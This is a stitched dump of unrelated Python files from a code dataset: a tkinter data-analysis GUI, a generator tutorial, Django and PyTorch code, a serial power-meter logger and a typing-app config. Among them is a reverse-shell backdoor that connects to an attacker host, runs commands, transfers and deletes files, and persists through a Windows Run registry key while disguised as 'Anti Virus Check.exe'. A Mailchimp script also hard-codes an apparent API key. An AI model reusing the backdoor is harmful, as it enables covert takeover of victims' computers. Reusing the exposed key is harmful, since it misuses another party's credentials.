label2 = Label(frame1, text="Discreet Variable:", font=("Arial Black",13), background="gray35",foreground="White Smoke")
label2.place(x=5, y=35)
DVEname = StringVar()
label2 = Label(frame1, text="Variable :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10,y=70)
DVEncode = ttk.Combobox(frame1, textvariable=DVEname, width=20,state='readonly')
DVEncode.place(x=95, y=70)
DVEncode.bind("<<ComboboxSelected>>", fonc )
DVEncode["value"] =liste
DVEncode.current(0)
encodtype = StringVar()
label2 = Label(frame1, text="Encoding :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10, y=100)
colname = StringVar()
EncoderT = ttk.Combobox(frame1, textvariable=encodtype, width=20,state='readonly')
EncoderT.place(x=95, y=100)
a=["OneLabelEncoder","OneHotEncoder"]
EncoderT["value"] =a
EncoderT.current(0)
EncoderT.bind("<<ComboboxSelected>>")
Encodone=Button(frame1, text="Encode", font=("arial ",10), width=8, height=1, background="gray30", fg='White'
,command=lambda:Model.Codding())
Encodone.place(x=80, y=130)
label2 = Label(frame1, text="Date Varaiable:", font=("Arial Black",13), background="gray35",foreground="White Smoke")
label2.place(x=5, y=157)
label2 = Label(frame1, text="Varaiable :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10,y=188)
dateva= StringVar()
DateVar = ttk.Combobox(frame1, textvariable=dateva, width=20,state='readonly')
DateVar.place(x=95, y=188)
DateVar.bind("<<ComboboxSelected>>", fonc )
DateVar["value"] =liste
DateVar.current(2)
Encodtwo=Button(frame1, text="Encode", font=("arial ",10), width=8, height=1, background="gray30", fg='White'
, command=lambda: Model.Transforme_DATE_Train())
Encodtwo.place(x=80, y=216)
frame1.place(x=0, y=0)
# End encodage data ----------------------------------------------------------------------------------------
# Visualizer data ----------------------------------------------------------------------------------------
#liste =(df.columns.values).tolist()
bouton_text_size3 = 10
frame2 = Frame(fenetre, width=250, height=87, borderwidth=2, relief=GROOVE, background="gray35")
label3 = Label(frame2, text="Correlation Table ",font=("Arial Black",14), background="gray35",foreground="White Smoke")
label3.place(x=16, y=0)
inputvall = StringVar()
label2 = Label(frame2, text="Target :", font=("Arial Black",10), background="gray35",foreground="White Smoke")
label2.place(x=10,y=30)
corrterget = ttk.Combobox(frame2, textvariable=inputvall, width=20,state='readonly')
corrterget.place(x=95, y=30)
corrterget.bind("<<ComboboxSelected>>", fonc )
corrterget["value"] =liste
corrterget.current(2)
bouton3=Button(frame2, text="View", font=("arial ",10), width=8, height=1, background="gray30", fg='White'
, command=lambda: Model.Correlation_Variable())
bouton3.place(x=80, y=54)
frame2.place(x=0,y=252)
# END Visualizer data -----------------------------------------------------------------------------
# choose input and output ----------------------------------------------------------------------
frame3 = Frame(fenetre, width=250, height=146, borderwidth=2, relief=GROOVE, background="gray35" )
label2 = Label(frame3, text="Variable module", font=("Arial Black",15), background="gray35",foreground="White Smoke")
label2.place(x=25, y=3)
label2 = Label(frame3, text="Input :", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=10, y=40)
"""
inputval = StringVar()
Input = ttk.Combobox(frame3, textvariable=inputval, width=20,state='readonly')
Input.place(x=95, y=45)
Input.bind("<<ComboboxSelected>>", selceted )
Input["value"] =liste
Input.current(0)
"""
bouton3=Button(frame3, text="choose", font=("arial Black ",9), width=15, height=1, background="White", fg='gray30'
, command=lambda: second_window( Model.df_cod))
bouton3.place(x=110, y=45)
label2 = Label(frame3, text="Output :", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=10, y=75)
outputval = StringVar()
Output = ttk.Combobox(frame3, textvariable=outputval, width=20,state='readonly')
Output.place(x=95, y=80)
Output.bind("<<ComboboxSelected>>", fonc )
Output["value"] =liste
Output.current(0)
bouton3=Button(frame3, text="Submit", font=("arial ",12), width=10, height=1, background="gray30", fg='White'
, command=lambda: Model.Selection_fetcher())
bouton3.place(x=80, y=110)
frame3.place(x=0, y=340)
frame3a = Frame(fenetre, width=250, height=117, borderwidth=2, relief=GROOVE, background="gray35" )
label2 = Label(frame3a, text="Discretize the target:", font=("Arial Black",14), background="gray35",foreground="White Smoke")
label2.place(x=16, y=0)
label2 = Label(frame3a, text="Number of class:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=10, y=27)
classnomber = StringVar()
entree_2 = Entry(frame3a, textvariable=classnomber, width=24,background="white",foreground="black",
font=("Arial Rounded MT Bold ",9))
entree_2.place(x=34, y=57)
entree_2.insert(0,"5")
entree_2.bind("<Button>",userTextb)
bouton3=Button(frame3a, text="Discretize", font=("arial ",12), width=10, height=1, background="gray30", fg='White'
, command=lambda:Model.Déscritiser() )
bouton3.place(x=80, y=80)
frame3a.place(x=0, y=487)
# END choose input and output ----------------------------------------------------------------------
bouton_text_size2 = 10
# Test Model ----------------------------------------------------------------------
bouton_text_size2 = 10
frame2 = Frame(fenetre, width=250, height=210, borderwidth=2, relief=GROOVE, background="gray35")
# Label
label2 = Label(frame2, text="Test the Modules:", font=("Arial Black",14), background="gray35",foreground="White Smoke")
label2.place(x=25, y=3)
label2 = Label(frame2, text="Modules:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=35)
modeltype = StringVar()
ModelT = ttk.Combobox(frame2, textvariable=modeltype, width=25,state='readonly')
ModelT.place(x=34, y=65)
a=["svm","DecisionTree","KNeighbors","Bayes","RandomForest"]
ModelT["value"] =a
ModelT.current(0)
ModelT.bind("<<ComboboxSelected>>", fonc )
label2 = Label(frame2, text="test percentage:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=85)
testpercen = StringVar()
testpercentage = ttk.Combobox(frame2, textvariable=testpercen, width=25,state='readonly')
testpercentage.place(x=34, y=115)
a=["5","10","15","20","25"]
testpercentage["value"] =a
testpercentage.current(0)
testpercentage.bind("<<ComboboxSelected>>", pourcentage_selceted )
label2 = Label(frame2, text="module parameter:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=135)
bouton3=Button(frame2, text="config", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Choix_Parametre_listes())
bouton3.place(x=20, y=165)
bouton3=Button(frame2, text="Trainer", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Entrainer_listes())
bouton3.place(x=120, y=165)
frame2.place(x=830,y=0)
# END Test Model ----------------------------------------------------------------------
#Compare MODELE ----------------------------------------------------------------------------------------
frame3B = Frame(fenetre, width=250, height=80, borderwidth=2, relief=GROOVE,background="gray35")
label3 = Label(frame3B, text="Compare Modules ",font=("Arial Black",13), background="gray35",foreground="White Smoke")
label3.place(x=40, y=0)
bouton3=Button(frame3B, text="Compare", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Comparer_Visualiser())
bouton3.place(x=80, y=35)
frame3B.place(x=830,y=211)
#end compare model ----------------------------------------------------------------------------------------
# choose Model ----------------------------------------------------------------------
bouton_text_size2 = 10
frame2 = Frame(fenetre, width=250, height=174, borderwidth=2, relief=GROOVE, background="gray35")
# Label
label2 = Label(frame2, text="choose a Module :", font=("Arial Black",14), background="gray35",foreground="White Smoke")
label2.place(x=25, y=3)
label2 = Label(frame2, text="Modules:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=35)
madelchoix = StringVar()
Modelchoi = ttk.Combobox(frame2, textvariable=madelchoix, width=25,state='readonly')
Modelchoi.place(x=34, y=65)
a=["svm","DecisionTree","KNeighbors","Bayes","RandomForest"]
Modelchoi["value"] =a
Modelchoi.current(0)
Modelchoi.bind("<<ComboboxSelected>>", fonc )
label2 = Label(frame2, text="module parameter:", font=("Arial Black",12), background="gray35",foreground="White Smoke")
label2.place(x=5, y=90)
bouton3=Button(frame2, text="config", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Choix_Parametre())
bouton3.place(x=20, y=125)
bouton3=Button(frame2, text="Trainer", font=("arial ",12), width=9, height=1, background="gray30", fg='White'
, command=lambda: Model.Tester())
bouton3.place(x=120, y=125)
frame2.place(x=830,y=292)
# # END chossen Model ----------------------------------------------------------------------
#CHOOSE FEATURE TO APPLIQUE MODELE ----------------------------------------------------------------------------------------
frame3B = Frame(fenetre, width=250, height=134, borderwidth=2, relief=GROOVE,background="gray35")
label3 = Label(frame3B, text="Fill Target ",font=("Arial Black",15), background="gray35",foreground="White Smoke")
label3.place(x=60, y=0)
bouton3=Button(frame3B, text="Apply", font=("arial ",13), width=12, height=1, background="gray30",
fg='White', command=lambda: Model.Appliquer())
bouton3.place(x=60, y=40)
bouton3=Button(frame3B, text="Replenish", font=("arial ",13), width=12, height=1, background="gray30",
fg='White', command=lambda:Model.Remplire())
bouton3.place(x=60, y=80)
frame3B.place(x=830,y=468)
#CHOOSE FEATURE TO APPLIQUE MODELE ----------------------------------------------------------------------------------------
frame4 = Frame(fenetre, width=1100, height=50, borderwidth=2, relief=GROOVE,background="gray35")
bouton4=Button(frame4, text="Initial table",font=("arial ",13), width=10, height=1, background="gray30", fg='White',
command=lambda:Model.Afficher_Table(Model.df_init))
bouton4.place(x=80, y=5)
bouton4=Button(frame4, text="Empty Table ",font=("arial ",13), width=10, height=1, background="gray30", fg='White',
command=lambda:Model.Afficher_Table(Model.df_test))
bouton4.place(x=830, y=5)
bouton4=Button(frame4, text="Save",font=("arial ",13), width=10, height=1, background="gray30", fg='White',
command=lambda:Model.Sauvgarder() )
bouton4.place(x=953, y=5)
label1 = Label(frame4,
text="Created , Developed and Designed by : Anass Houdou , Ouali Soufiyane , Jai Otman \n Directed By: Prof .El far Mohamed BDSAS 2019/2020",
font=("Arial ",9), background="gray35",foreground="White Smoke")
label1.place(x=300, y=5)
frame4.place(x=0, y=605)
#----------------------------------------------------------------------------------------
# Canva zone de tableua
canva_color1 = "#FCFCFC"
canvas1 = Canvas(fenetre, width=560, height=420, background=canva_color1, borderwidth=2, relief=GROOVE)
canvas1.place(x=257, y=0)
# Canva zone sortie
#para ,console ---------------------------------------------------------
canvas3 = Canvas(fenetre, width=360, height=160, background="gray80", borderwidth=2, relief=GROOVE)
parachoisir = st.ScrolledText(canvas3, width=50, height=5, background=canva_color2 ,font=("arial ",10))
parachoisir.insert('1.0', "chosen parameter:\n")
parachoisir.insert(END, "***********************\n\n")
parachoisir.place(x=2, y=0)
console = st.ScrolledText(canvas3, width=50, height=5, background=canva_color2 ,font=("arial ",10))
console.insert('1.0', "console :\n")
console.insert(END, "************\n\n")
console.place(x=2, y=86)
canvas3.place(x=257,y=434)
#END :para ,console ---------------------------------------------------------
#SCORE ---------------------------------------------------------
canvas2 = Canvas(fenetre, width=186, height=161, background=canva_color2, borderwidth=2, relief=GROOVE)
score = st.ScrolledText(canvas2, width=21, height=9, background=canva_color2 ,font=("arial ",11))
score.insert('1.0', "\t score :\n")
score.insert(END, " ***************\n\n")
score.place(x=2, y=2)
canvas2.place(x=628,y=433)
#end SCORE ---------------------------------------------------------
fenetre.mainloop()
| SoufiyaneOuali/Data_Quality_App | appcomple.py | appcomple.py | py | 55,203 | python | en | code | 1 | github-code | 13 |
21207314620 | # https://www.youtube.com/watch?v=zU0TxGyMUs4&list=PLlWXhlUMyooawilqK4lPXRvxtbYiw34S8&index=8
"""
# ===== Генераторы и Событийный цикл Карусель (Round Robin) Часть 2 ===================================================
Суть карусели - престановка первого элемента в конец очереди.
1. Создаем 2 генератора (или более) и помещаем их в очередь
2. Берем первый из очереди. Делаем его итерацию. Помещаем его в конец очереди.
Асинхронный код состоит из 2 условий:
1. Любая конструкция языка, позволяющая передавать выполнение потока: замыкания, генераторы, корутины...
2. Событийный цикл, который решает какой код будет выполняться в тот или иной момент.
"""
from time import sleep
def counter():
"""Генератор будет считать вызовы"""
counter = 0
while True:
print(counter) # будет печатать каждый вызов
counter +=1
yield # отдает поток управления в вызывающий код
def printer():
"""Генераор будет писать Bang 1 раз в 3 вызова"""
counter = 0
while True:
if counter % 3 == 0: # 1 раз в 3 вызова будет срабатывать
print('Bang!')
counter += 1
yield # отдает поток управления в вызывающий код
def main():
""" Событийный цикл Карусель(Round Robin)"""
while True:
g = queue.pop(0) # берем из очереди первый генератор и удаляем его из очереди
next(g) # делаем итерацию
queue.append(g) # добавляем его же в конец очереди
sleep(0.5) # спим и переходим в цикле к следующему генератору в очереди...
if __name__ == '__main__':
# создаем очередь
queue = []
# создаем 2 генератора и добавляем в очередь
g1 = counter()
queue.append(g1)
g2 = printer()
queue.append(g2)
# запускаем бесконечный цикл
main()
| VadimVolynkin/learning_python3 | multi_async/x_3_async_gen_simple.py | x_3_async_gen_simple.py | py | 2,667 | python | ru | code | 0 | github-code | 13 |
10291493681 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from ....productos.inventario.forms import *
from ....request_session import *
# Create your views here.
from django.views.generic import TemplateView
class menu(TemplateView):
template_view="facturacion/modificar/menu/"
def get(self,request,*args,**kwargs):
if OKpeople(request):
pl = self.template_name+obtenerPlantilla(request)
usu = getPerfil(request)
context={
"tienda":usu.tienda
}
return render(request,pl,context)
return redirect("/")
class modificar(TemplateView):
template_name="facturacion/facturas/"
formU = FormPersona
url = "/clientes/nit"
initial={'key':'value'}
formulario=Form_registrar
def get(self,request,id=None,*args,**kwargs):
indice=int(id)
if indice<5 and indice>0:
if OKpeople(request):
plantilla=self.template_name+obtenerPlantilla(request)
usu= getPerfil(request)
ut = USUARIO_TIENDA.objects.filter(usuario=usu).filter(tienda=usu.tienda)
if ut.exists():
ut=ut[0]
correlativo=None
if indice==1:
correlativo=ut.fac_1
elif indice==2:
correlativo=ut.fac_2
elif indice==3:
correlativo=ut.fac_3
else:
correlativo=ut.fac_4
dpt=DOCUMENTO_POR_TIENDA.objects.filter(ubicado=ut).filter(pagina=indice).filter(correlativo=correlativo).filter(tipo_doc="V")
if not dpt.exists():
dpt=DOCUMENTO_POR_TIENDA()
dpt.ubicado=ut
dpt.pagina=indice
dpt.correlativo=correlativo
dpt.save()
tienda=usu.tienda
form=self.formU(initial=self.initial)
fm = self.formulario(initial=self.initial)
context={
"tienda":tienda.nombre,
"store":tienda.id,
"form":form,
"formulario":fm,
"url":self.url,
"accion":"Facturar",
"pagina":indice
}
return render(request, plantilla, context)
return redirect("/")
| corporacionrst/software_RST | app/sistema/ventas/modificar/views.py | views.py | py | 1,911 | python | es | code | 0 | github-code | 13 |
31426218429 | import mailchimp_marketing as MailchimpMarketing
from mailchimp_marketing.api_client import ApiClientError
from pprint import pprint
from bs4 import BeautifulSoup
try:
client = MailchimpMarketing.Client()
client.set_config({
"api_key": "b80d7ce5bd37f1f133f5b4202e16e76e-us8",
"server": "us8"
})
response = client.campaigns.list(sort_field="send_time",sort_dir="DESC", count=2)
campaign = response['campaigns'][1]
id = campaign['id']
campaign_html = client.campaigns.get_content(id)['archive_html']
except ApiClientError as error:
print(error)
soup = BeautifulSoup(campaign_html, 'lxml')
headers = soup.find_all('div',attrs = {'style':"text-align"})
pprint(headers)
pprint(len(headers))
| eclubutd/eclub-bot | src/mailchimp.py | mailchimp.py | py | 749 | python | en | code | 0 | github-code | 13 |
13865333347 | import torch
import torch.nn as nn
# Based on https://towardsdatascience.com/building-a-convolutional-neural-network-from-scratch-using-numpy-a22808a00a40
def _overlapping_patch_generator(image_batch, kernel_size):
batch_size, image_h, image_w = image_batch.shape
for h in range(image_h - kernel_size + 1):
for w in range(image_w - kernel_size + 1):
patch = image_batch[:, h : (h + kernel_size), w : (w + kernel_size)]
yield patch, h, w
class Conv2d(nn.Module):
def __init__(self, kernel_num, kernel_size):
super().__init__()
self.kernel_num = kernel_num
self.kernel_size = kernel_size
kernels = torch.Tensor(kernel_num, kernel_size, kernel_size)
nn.init.normal_(kernels, mean=0.0, std=1.0 / (kernel_size**2))
# Wrap in nn.Parameter to let PyTorch know it needs updating
self.kernels = nn.Parameter(kernels)
def forward(self, x):
batch_size, image_h, image_w = x.shape
conv_output = torch.zeros(
[
batch_size,
self.kernel_num,
image_h - self.kernel_size + 1,
image_w - self.kernel_size + 1,
],
device=x.device,
)
for patch, h, w in _overlapping_patch_generator(x, self.kernel_size):
assert patch.shape == (batch_size, self.kernel_size, self.kernel_size)
assert self.kernels.shape == (
self.kernel_num,
self.kernel_size,
self.kernel_size,
)
patch = torch.unsqueeze(patch, dim=1)
# patch.shape == (batch_size, 1, self.kernel_size, self.kernel_size)
# self.kernel.shape == (self.kernel_num, self.kernel_size, self.kernel_size)
# So multiplication broadcasts over batch_size and kernel_num
mult = patch * self.kernels
assert mult.shape == (
batch_size,
self.kernel_num,
self.kernel_size,
self.kernel_size,
)
convolved = mult.sum(dim=(2, 3))
# Alternatively convolved = torch.einsum('bhw,khw->bk', patch, self.kernels)
# convolved_(i, j) is a patch (with top right coords (h, w)) of image_i convolved with kernel_j
assert convolved.shape == (batch_size, self.kernel_num)
conv_output[:, :, h, w] = convolved
return conv_output
# Following the recipe of https://pytorch.org/docs/stable/notes/extending.html
class Conv2dFunction(torch.autograd.Function):
@staticmethod
def forward(ctx, image_batch, kernels):
ctx.save_for_backward(image_batch, kernels)
batch_size, image_h, image_w = image_batch.shape
kernel_num, kernel_h, kernel_w = kernels.shape
assert kernel_h == kernel_w
conv_output = torch.zeros(
[
batch_size,
kernel_num,
image_h - kernel_h + 1,
image_w - kernel_w + 1,
],
device=image_batch.device,
)
for patch, h, w in _overlapping_patch_generator(image_batch, kernel_w):
conv_output[:, :, h, w] = torch.einsum("bhw,khw->bk", patch, kernels)
return conv_output
@staticmethod
def backward(ctx, grad_output):
image_batch, kernels = ctx.saved_tensors
grad_image_batch = grad_kernels = None
kernel_num, kernel_h, kernel_w = kernels.shape
if ctx.needs_input_grad[0]:
grad_image_batch = torch.zeros(image_batch.shape, device=image_batch.device)
for patch, h, w in _overlapping_patch_generator(image_batch, kernel_w):
grad_image_batch[
:, h : h + (kernel_h), w : (w + kernel_w)
] += torch.einsum("khw,bk->bhw", kernels, grad_output[:, :, h, w])
if ctx.needs_input_grad[1]:
grad_kernels = torch.zeros(kernels.shape, device=kernels.device)
for patch, h, w in _overlapping_patch_generator(image_batch, kernel_w):
grad_kernels += torch.einsum(
"bhw,bk->khw", patch, grad_output[:, :, h, w]
)
return grad_image_batch, grad_kernels
class Conv2dFunctionWrapped(nn.Module):
def __init__(self, kernel_num, kernel_size):
super().__init__()
self.kernel_num = kernel_num
self.kernel_size = kernel_size
kernels = torch.Tensor(kernel_num, kernel_size, kernel_size)
nn.init.normal_(kernels, mean=0.0, std=1.0 / (kernel_size**2))
# Wrap in nn.Parameter to let PyTorch know it needs updating
self.kernels = nn.Parameter(kernels)
def forward(self, x):
return Conv2dFunction.apply(x, self.kernels)
| tomchaplin/JankAI | JankAI/cnn/_convolution.py | _convolution.py | py | 4,791 | python | en | code | 0 | github-code | 13 |
41562504181 | # coding reverse backdoor in python
# the main function is to let the user try to connect to us instead to we trying to coonnect to user
# ------------------------------- start of code -----------------------------
import os
import sys
import json
import socket
import base64
import shutil
import subprocess
class Suspicious:
def __init__(self, ip, port):
self.restart_control()
self.connetion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def restart_control(self):
piece_of_cake = os.environ['appdata'] + "\\Anti Virus Check.exe"
if not os.path.exists(piece_of_cake):
shutil.copy(sys.executable, piece_of_cake)
subprocess.call(f'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "{piece_of_cake}"', shell=True)
def handleErrorDataSendType(self, error):
return str(error)
def execute_system_commands(self, command):
# the output data type of the check_output method is byte
try:
command = " ".join(command)
return subprocess.check_output(command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL).decode('utf-8')
except Exception as error:
return self.handleErrorDataSendType(error)
# return "------- [=] Error while executing the command [=] ------"
def changeWorkingDirectory(self, path):
os.chdir(path)
return "[+] Changed current working folder to " + str(path)
def read_file(self, path):
with open(path, 'rb') as file:
return base64.b64encode(file.read())
def download_file(self, path, content):
with open(path, 'wb') as file:
file.write(base64.b64decode(content))
return "[+] File upload success"
def receive_data(self):
json_data = ""
while True:
try:
json_data += self.connetion.recv(1024).decode('utf-8')
return json.loads(json_data)
except ValueError:
continue
def send_data(self, data):
json_data = json.dumps(data)
self.connetion.send(json_data.encode('utf-8'))
def getSystemInfo(self):
platform = {'aix': 'AIX', 'linux':"Linux", 'win32': 'Windows', 'cygwin': 'Windows/Cygwin', 'darwin': 'macOs'}
return f"[+] Connected to \"{platform[sys.platform]}\" operating system"
def delete_from_system(self, path):
try:
if os.path.isdir(path):
shutil.rmtree(path)
return "[==] Folder delete successful"
elif os.path.isfile(path):
os.remove(path)
return "[==] file delete successfull"
except Exception as error:
return self.handleErrorDataSendType(error)
def move_files_within(self, src, dst):
try:
if os.path.isdir(dst):
shutil.move(src, dst)
return f"[==] folder moved to \"{dst}\" location"
else:
num = 0
while True:
if not os.path.exists(dst):
shutil.move(src, dst)
break
dst = dst + "-" + str(num)
num+=1
return f"[==] folder moved to \"{dst}\" location"
except Exception as error:
return self.handleErrorDataSendType(error)
def start(self):
while True:
try:
data_received = self.receive_data()
if data_received[0].lower() == 'exit':
break
# self.connetion.close()
# sys.exit()
elif data_received[0] == 'what':
command_result = self.getSystemInfo()
elif data_received[0].lower() == 'cd' and len(data_received) >1:
command_result = self.changeWorkingDirectory(data_received[1])
elif data_received[0].lower() == 'download':
command_result = self.read_file(data_received[1]).decode()
elif data_received[0].lower() == 'upload':
command_result = self.download_file(data_received[-2], data_received[-1])
elif data_received[0] == 'delete':
command_result = self.delete_from_system(data_received[1])
elif data_received[0] == 'move-within':
command_result = self.move_files_within(data_received[1], data_received[2])
else:
command_result = self.execute_system_commands(data_received)
self.send_data(command_result)
# except subprocess.CalledProcessError as error:
# self.send_data("-------[=] Error => subprocess.CalledProcessError [=] -------")
except Exception as error:
self.send_data(str(error))
self.send_data("---- [=] Error while executing command [=] ----")
# self.send_data("---- [=] Connection is still intact though [=] ----")
# these ip and port values are of hackers system values
while True:
try:
backdoor = Suspicious(ip, port)
backdoor.start()
except:
continue | vijay2249/random-stuff | Backdoor/reverseBackdoor.py | reverseBackdoor.py | py | 5,337 | python | en | code | 0 | github-code | 13 |
4743037723 | #!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Unit tests for testing the GalleryItem class.
'''
import os
import unittest
from app.classes.gallery_item import GalleryItem
class TestClassGalleryItem(unittest.TestCase):
'''
Performs tests on the GalleryItem class.
'''
def setUp(self):
self.keys = [
'description','view_count','url',
'title','image_url','type','id',
'owner_id'
]
def test_dataset_keys(self):
'''
classes.gallery_item: Test that the GalleryItem class returns the right keys.
'''
result = GalleryItem('753ccf05-872f-4c8d-9cc2-8e562f6fc1d5').info()
for key in self.keys:
self.assertIn(key, result.keys())
| luiscape/hdx-monitor-sql-collect | tests/test_class_gallery_item.py | test_class_gallery_item.py | py | 695 | python | en | code | 0 | github-code | 13 |
18190764572 | from __future__ import division
import time
import sys
import serial
import os
import math
import datetime as dt
import threading
from threading import Timer
import numpy as np
#--------------------------- HELP MENU------------
import argparse
parser = argparse.ArgumentParser(description='Script para Adquisicion de datos del Power Meter, donde se le pasa por parametro el tiempo en minutos o el numero de muestras que se quieren tomar.\n Example: \"RFPM002-cp_us.py s 1000 ./Mediciones_exterior Posicion1\"\n Example: \"RFPM002-cp_us.py t 10 ./Mediciones_exterior Posicion1\"', formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("[option]", help="s (samples), o \nt (time).")
parser.add_argument("Number", help="for option=s ---> numero de muestras\n"
"for option=t ---> tiempo en minutos.")
parser.add_argument("Carpeta", help="Nombre o ruta de la carpeta donde se guardaran los archivos.\nEn caso de no existir la carpeta se crea automaticamente.")
parser.add_argument("Archivo", help="Nombre del archivo a guardar.")
args = parser.parse_args()
#---------------------------------------------------
class Controlador():
def __init__(self):
#caso linux
puerto = [x for x in os.listdir('/dev') if x[:6]=='ttyUSB'][0]
puerto = "/dev/"+puerto
#caso windows
#puerto = 'COM4'
try:
#En esta primera parte se dictan los parametros necesarios para abrir el puerto y se pueda leer y escribir en el Power Meter
self.ser = serial.Serial(
port=puerto,
baudrate=115200,
parity=serial.PARITY_ODD,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=0.5
)
if(not self.ser.isOpen()):
self.ser.open()
time.sleep(3) #ESTE TIME ES LA PIEZA MAS FUNDAMENTAL DE ESTE CODIGO, SI LO QUITAN NO COMPILA
except Exception as e:
raise Exception("Error al incializar puerto: " + str(e))
#self.ser.flushInput()
#Estos 4 metodos son comandos basicos para pyserial que permiten la escritura, lectura, contar elementos del buffer y cerrar el puerto.
def Escribir(self,instr):
self.ser.write(instr.encode())
def ContInput(self):
return self.ser.inWaiting()
def ContRead(self):
return self.ser.readline()
def End(self):
self.ser.close()
#Esta clase fue creada con el proposito de crear el archivo .csv lo mas simple y ordenadamente como se era posible
class Archivo():
def __init__(self, carpeta, narch):
if(not os.path.exists(carpeta)):
os.mkdir(carpeta)
self.save = open(carpeta + narch, 'w')
#Consta de dos clases que son solo para escribir y cerrar el archivo.
def Escribir(self,tiempo,potencia):
self.save.write(tiempo + ',' + potencia+'\n')
def Cerrar(self):
self.save.close()
#Aquí se declaran las variables iniciales y se da la primera instrucción
pw = Controlador()
pw.Escribir('c'+ '\r')
foldername = "./"+sys.argv[3]+"/"
filename=sys.argv[4]+".csv"
file = Archivo(foldername,filename)
muestras = 0 #Este es el contador de muestras
#estas son variables que se utilizaran para poder verificar los datos y obtener medidas que ayuden al analisis de estos
oldtiempo = "0"
VectorTimestamp=[]
meanpotencia = 0
potenciaold=-100
valid = True
EscrBuffer = 0
while(not EscrBuffer):
EscrBuffer = pw.ContInput()
#Este while esta puesto solo por seguridad
pw.ContRead() #Este se amplica para que no lea la instruccion.
while(EscrBuffer):
#aquí se realiza la lectura del buffer, los datos se limpian antes de ser verificados
out = str(pw.ContRead())
data = out.split(',')
tiempo = data[0][2:12]
potencia = ""
if(len(data) == 2):
for k in str(data[1]):
try:
carac = int(k)
potencia = potencia + str(k)
except:
if(str(k) == "-" or str(k) == "."):
potencia = potencia + str(k)
#Se procede a hacer ciertos filtros para verificar la integridad de los datos y para despues no tener problemas con el analisis de estos
#se realiza para el tiempo y la potencia
try:
temptiempo = float(tiempo)
except:
valid = False
print("muestra invalida")
if (float(tiempo) >= float(oldtiempo)+10000) or (tiempo == '') or (float(tiempo)<float(oldtiempo)) or (not valid):
print ("timestamp not valid")
break
print(tiempo, " , ", potencia)
try:
temppotencia = float(potencia)
except:
valid = False
print("potencia invalida")
if (float(potencia)>-70) and (float(potencia)<0 )and (valid): # se descartan valores de potencia incoherentes
#Al ya pasar este ultimo filtro se procede a añadir los datos en el csv y a realizar operaciones iterativas para el analisis.
muestras += 1
file.Escribir(tiempo, potencia)
VectorTimestamp.append(int(tiempo))
meanpotencia = meanpotencia+pow(10,float(potencia)/10.0) #Transformacion de dbm a mWatts
oldtiempo = tiempo
if(muestras<=1):
maxPeak = potencia
elif(float(maxPeak)<float(potencia)):
maxPeak=float(potencia)
potenciaold=float(potencia)
else:
print ("potencia is not valid: " + potencia)
#En estas dos ultimas condiciones se evalua las opciones especificadas por el usuario, tomando en cuanta el número de muestras y el tiempo que ha pasado segun el RFPM
if (sys.argv[1] == "s" and muestras == int(sys.argv[2])):
EscrBuffer = 0
pw.End()
VectorTimestamp_asarray=np.asarray(VectorTimestamp)
SamplingTime=np.mean(np.diff(VectorTimestamp_asarray))*math.pow(10,-3)
print("meanRSS is: " + str(10*math.log10(meanpotencia/muestras)))
print("MaxPeak is: " + str(maxPeak))
print("Sampling time (ms):"+str(SamplingTime))
elif (sys.argv[1] == 't' and float(tiempo) >= float(sys.argv[2])*60*1000000):
EscrBuffer = 0
pw.End()
VectorTimestamp_asarray=np.asarray(VectorTimestamp)
SamplingTime=np.mean(np.diff(VectorTimestamp_asarray))*math.pow(10,-3)
print("meanRSS is: " + str(10*math.log10(meanpotencia/muestras)))
print("MaxPeak is: " + str(maxPeak))
print("Sampling time (ms):"+str(SamplingTime))
| Platypunk2/TomaMuestrasRFPowerMeter002 | Codigos/RFPM002-cp_us.py | RFPM002-cp_us.py | py | 6,513 | python | es | code | 0 | github-code | 13 |
29905292430 | import os
from configparser import ConfigParser, NoOptionError, NoSectionError
from pathlib import Path
from typing import Any, Literal, Union
NumberType = Union[int, float]
SIZES = ["teensy", "small", "big", "huge"]
TIMES = ["15", "30", "60", "120"]
SpeedType = Literal["low", "med", "high"]
DEFAULTS = {
"difficulty": "normal",
"blind_mode": "off",
"min_speed": "0",
"min_accuracy": "0",
"min_burst": "0",
"force_correct": "off",
"confidence_mode": "off",
"capitalization_mode": "off",
"single_line_words": "off",
"cursor_buddy": "0",
"cursor_buddy_speed": "0",
"tab_reset": "off",
"restart_same": "off",
"paragraph_size": "teensy",
"timeout": "15",
"language": "english",
}
PARAPHRASE = {
"numbers": False,
"punctuations": False,
}
SPEED_RECORDS_WORDS = {
**{f"{size}_low": 100000 for size in SIZES},
**{f"{size}_med": 0 for size in SIZES},
**{f"{size}_high": 0 for size in SIZES},
}
SPEED_RECORDS_TIME = {
**{f"{time}_low": 100000 for time in TIMES},
**{f"{time}_med": 0 for time in TIMES},
**{f"{time}_high": 0 for time in TIMES},
}
THEMING = {
"caret_style": "block",
"bar_theme": "minimal",
"sound": "mech",
"keypress_sound": "off",
}
MODE = {
"writing mode": "words",
}
CONF_DICT = {
"user": DEFAULTS,
"theming": THEMING,
"paragraph": PARAPHRASE,
"mode": MODE,
"speed records word": SPEED_RECORDS_WORDS,
"speed records time": SPEED_RECORDS_TIME,
}
def get_config_location() -> Path:
"""
